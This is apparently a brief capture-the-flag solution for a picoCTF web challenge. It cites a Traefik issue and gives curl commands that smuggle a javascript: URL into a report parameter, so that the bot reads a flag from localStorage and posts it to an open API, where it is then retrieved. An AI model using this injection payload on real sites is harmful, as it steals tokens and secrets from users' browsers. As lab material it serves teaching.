This git issue (https://github.com/traefik/traefik/issues/9164) allows us to replace the url parameter with Javascript which posts the flag to the reports. An open API then leaks the flag to us.
port=64305
curl --globoff 'http://saturn.picoctf.net:'$port'/report?id=;url=javascript:fetch("/api/reports/add",{method:"POST",headers:{"Content-Type":"application/json","Authorization":`Bearer%20${localStorage.getItem('\''flag'\'')}`},body:JSON.stringify({screenshot:localStorage.getItem('\''flag'\'')})})' -v
sleep 4
curl 'http://saturn.picoctf.net:'$port'/api/reports/get'
